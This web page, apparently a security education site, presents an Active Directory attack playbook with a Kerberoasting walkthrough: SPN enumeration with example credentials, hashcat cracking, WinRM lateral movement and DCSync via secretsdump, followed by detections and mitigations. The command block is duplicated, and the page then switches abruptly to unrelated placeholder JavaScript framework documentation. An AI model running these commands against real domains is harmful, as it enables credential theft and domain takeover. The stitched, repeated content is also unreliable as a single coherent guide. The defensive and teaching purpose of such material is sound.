homepage

hackherway Active Directory Attack Playbook

Welcome to the hackherway Active Directory Attack Playbook _ Cyber Attack Catalog

Welcome to your central knowledge hub for understanding, simulating, and defending against enterprise-level security threats. This resource aims to combine offensive tactics and defensive strategy. It provides actionable and meaningful insights into how attackers compromise identity infrastructures and how you can stop them.

🛡️ Purpose of This Resource

Active Directory (AD) is the primary target for modern cyber attacks. It acts as the “keys to the kingdom” for enterprise networks.

This repository serves two core purposes:

  • The Playbook: Maps out lulti-stage attack pathways used by real-world adversaries to gain domain dominance.
  • The Catalog: Breaks down individual technical exploits, tools, and vulnerabilities into distinct, understandable components.

🔍 What You Will Find Inside

1. Active Directory Attack Playbook

  • Complete walk-throughs of the attack lifecycle from initial access to full domain takeover.
  • Step-by-step documentation of credential dumping, Kerberoasting, lateral movement, DCSync, and privilege escalation.
  • Clear visual diagrams and mind maps of complex AD trust exploitation and delegation abuses.

2. Cyber Attack Catalog

  • A comprehensive technical registry of specific attack vectors.
  • Direct mappings of industry-standard frameworks like MITRE ATT&CK.
  • Reproducible proof-of-concept commands alongside exact indicators of compromise (IOCs).

3. Practical Remediation Manuals

  • Concrete hardening guides tailored for security professionals.
  • Group Policy Object (GPO) configurations to block specific attack vectors.
  • Custom SIEM logging rules and detection strategies to catch attackers early.

🚀 How to Navigate

  • New to AD Security? Start with the Catalog to learn basic concepts like Kerberoasting, AS-REP Roasting, and LLMNR/NBT-NS Poisoning.
  • Red, Blue, and Purple Teams: Dive into the Playbook to understand how these individual attacks chain together during a full-scale network breach.
  • Looking for Hardening Guides? Every attack entry includes a dedicated Mitigation Section to help you patch vulnerabilities instantly.
  • Stay Safe.
  • Stay Vigilant.
  • Stay Informed.

Happy hacking!

DISCLAIMER: ETHICAL HACKING & SECURITY EDUCATION

The Active Directory Attack Playbook and Cyber Attack Catalog are provided strictly for educational and ethical purposes. The information, methodologies, and tools detailed herein are designed to help and educate cybersecurity practitioners, security professionals, systems administrators, and red/blue/purple teams understand how malicious actors exploit Active Directory and broader network infrastructure to better defend them.

By accessing, reading, or utilizing any part of this playbook and catalog, you expressly agree to the following terms:

  • Authorization is Mandatory: You must not attempt any of the attacks, techniques, or procedures outlined in this material on systems, networks, or domains for which you do not personally own and without explicit, written, and legal authorization from the rightful network/system owner(s).
  • Strictly for Defensive Posture: The content provided is intended solely to assist in vulnerability identification, risk assessment, and the implementation of defensive controls (e.g., Tiered Administration, GPO hardening, and Continuous Monitoring).
  • No Liability: The creator(s) and publisher(s) of this page accept no liability for any damage, unauthorized access, data loss or corruption, or legal consequences resulting from your misuse of this information. You have been warned.
  • Risk of System Instability: Executing cyber attack simulations in live environments, especially those involving domain controllers and authentication systems, carries a high risk of service disruption, accidental lockouts, and system crashes.

For comprehensive, official guidance on defending and mitigating vulnerabilities within Active Directory, consider reviewing the official documentation and resources provided by the CISA Detecting and Mitigating Active Directory Compromises advisory.

Kerberoasting

ATT&CK: T1558.003 (Kerberoasting), T1021 (Remote Services), T1003.006 (DCSync)

Scope: Authorized Lab/Assessment Only

Objective

Obtain a service account credential via Kerberos TGT requests/analysis, and use it for lateral movement, and (if misconfiguration permits), perform directory replication using DCSync.

Environment (assumed)

  • Domain: hackherway.local
  • Domain Controller: DC01 – 10.8.10.225
  • Service Host: SVC01 – 10.8.10.15
  • Operator Box: KALI – 10.8.10.50

Procedure (High-Level)

1. Enumerate SPN-bearing accounts; request TGS as a standard domain user.

2. Analyze TGS offline to recover weak service account credentials via brute-force.

3. Validate access; laterally move (e.g., WinRM/SMB) to SVC01.

4. If group/ACL misconfiguration allows, attempt directory replication (DCSync) from DC01

Legal/Ethical: Commands below are examples that were performed in an authorized lab only.

Attack Command Examples (authorized lab)

Objective

  • Obtain a service account credential via Kerberos TGS request/analysis.
  • Use it for lateral movement.
  • If misconfiguration permits, perform directory replication (DCSync).

Environment

  • Domain: hackherway.local
  • Domain Controller (DC): DC01 — 10.8.10.225
  • Service Host: SVC01 — 10.8.10.15
  • Operator Box: KALI — 10.8.10.50

Procedure (High-Level)

  1. Enumerate SPN-bearing accounts; request TGS as a standard domain user.
  2. Analyze TGS offline to recover weak service account credentials.
  3. Validate access; laterally move (e.g., WinRM/SMB) to SVC01.
  4. If group/ACL misconfiguration allows, attempt directory replication (DCSync) from DC01.
Legal/Ethical: Commands below are documentation examples for authorized labs only.

Attack Command Examples (Authorized Lab)

# Enumerate SPNs + request TGS (example creds) GetUserSPNs.py hackherway.local/jane.doe:'Winter2025!' -dc-ip 10.8.10.225 -request | tee spns.out # Offline key analysis (RC4/AES as applicable) hashcat -m 13100 spns.out /wordlists/rockyou.txt # Validate creds / lateral movement to SVC01 (WinRM) crackmapexec winrm 10.8.10.15 -d hackherway.local -u svc-backup -p '<cracked>' evil-winrm -i 10.8.10.15 -u svc-backup -p '<cracked>' # Directory replication (if account/ACL permits) secretsdump.py 'hackherway.local/svc-backup:<cracked>@10.8.10.225' -just-dc

Telemetry to Collect

  • Kerberos: 4768 / 4769 / 4771 (TGT/TGS/pre-auth anomalies)
  • Logons: 4624 (Type 3/10) from new sources; 4625 bursts
  • Service install: 7045 (PsExec-like behavior)
  • Directory changes: 5136 / 5137 (group/ACL/GPO edits)
  • Replication access: 4662 (Get-Changes / Get-Changes-All)

SIEM Analytics (Splunk Examples)

# Kerberoasting detection index=wineventlog (EventCode=4769) | stats count by ServiceName, IpAddress | where count>100 # DCSync detection index=wineventlog EventCode=4662 | search AccessMask="*0x100*" OR AccessMask="*0x200*"

Mitigations

  • Service accounts: Use 25+ char random passwords; enforce AES-only (disable RC4).
  • SPN hygiene: Remove SPNs from highly privileged users.
  • Lateral controls: Limit WinRM to jump hosts; use Windows LAPS for local admins; follow a tiered admin model (T0/T1/T2).
  • Monitoring: Alert on 5136/5137 for Tier-0 objects; monitor 4662 (replication activity).
  • Post-incident: Perform KRBTGT double rotation.
# Enumerate SPNs + request TGS (example credentials) GetUserSPNs.py hackherway.local/jane.doe:'Winter2025!' -dc-ip 10.8.10.225 -request | tee spns.out # Offline key analysis (RC4/AES as applicable) hashcat -m 13100 spns.out /wordlists/rockyou.txt # Validate creds / lateral movement to SVC01 (WinRM) crackmapexec winrm 10.8.10.15 -d hackherway.local -u svc-backup -p '<cracked>' evil-winrm -i 10.8.10.15 -u svc-backup -p '<cracked>' # Directory replication (if account/ACL permits) secretsdump.py 'hackherway.local/svc-backup:<cracked>@10.8.10.225' -just-dc

Using NPM

The recommended way to install is via your package manager of choice.

# Install via npm npm install "tutorial-package" # Or with yarn yarn add "tutorial-package"

Using CDN

For quick prototyping, you can also load directly from a CDN.

<script src="https://cdn.example.com/package.js"></script>

Core Concepts

Understanding the fundamental concepts is essential before diving into implementation details. This section covers the architecture and design patterns used throughout the library.

Architecture

The system follows a modular architecture where each component is self-contained and can be used independently. The main entry point exports a factory function that creates instances with their own state.

State management is handled internally using a reactive proxy system. When data changes, dependent components automatically re-render without manual intervention.

Lifecycle

Every component goes through a well-defined lifecycle: initialization, mounting, updating, and destruction. Hooks are provided at each stage for custom logic.

const component = new Component({ onMount: () => console.log('Mounted!'), onUpdate: (data) => console.log('Updated:', data), onDestroy: () => console.log('Clean up') });

Reactivity

The reactivity system uses Proxies to intercept property access and mutations. When a reactive property is read inside a computed function, that function is registered as a dependency.

Components

Components are the building blocks of any application built with this system. They encapsulate markup, styles, and behavior into reusable units.

Defining Components

A component is defined as a plain object with specific properties. The render function returns the virtual DOM representation.

export default { name: 'Button', props: ['variant', 'size'], render(props) { return `<button class="btn btn--${props.variant}">${props.children}</button>`; } };

Props & Events

Props are passed from parent to child and are read-only within the child component. For two-way communication, events are emitted upward through the component tree.

Validation can be added to ensure props meet expected types and constraints. Failed validation throws a descriptive error in development mode.

Slots

Slots allow content composition. A default slot receives any content placed between the component's opening and closing tags. Named slots enable multiple insertion points.

Routing

The router maps URLs to components. It supports dynamic segments, query parameters, and nested route definitions.

Basic Setup

Create a router instance and define your routes as an array of route objects. Each route specifies a path pattern and the component to render.

const router = createRouter({ routes: [ { path: '/', component: Home }, { path: '/about', component: About }, { path: '/user/:id', component: User } ] });

Programmatic Navigation

Beyond link clicks, you can navigate imperatively using the router instance methods. This is useful for redirects after form submission or conditional logic.

Navigation Guards

Guards intercept navigation and can prevent or redirect it. Use them for authentication checks, confirmation dialogs, or data preloading.

State Management

For complex applications, a centralized store helps manage shared state. The store follows a unidirectional data flow pattern.

Creating a Store

A store is created by defining an initial state object and a set of mutations that modify that state. Actions can contain asynchronous logic before committing mutations.

const store = createStore({ state: () => ({ count: 0 }), mutations: { increment(state) { state.count++; } } });

Getters

Getters compute derived state. They receive the state as an argument and return a computed value. Getters are cached and only re-evaluate when their dependencies change.

Actions

Actions are similar to mutations but can contain asynchronous operations. An action commits mutations rather than directly mutating state.

Advanced Topics

This section covers patterns and techniques for building production-grade applications.

Performance Optimization

Virtual scrolling, lazy loading, and code splitting are built-in features. The compiler also performs static analysis to eliminate dead code and optimize runtime performance.

Testing

The testing utilities provide helper functions for mounting components, triggering events, and asserting on rendered output. Tests run in a headless browser environment.

test('button click increments counter', async () => { const wrapper = mount(Counter); await wrapper.find('button').trigger('click'); expect(wrapper.text()).toContain('1'); });

Deployment

Build for production with tree-shaking and minification. Static sites can be deployed to any CDN or static host. Server-side rendering requires a Node.js environment.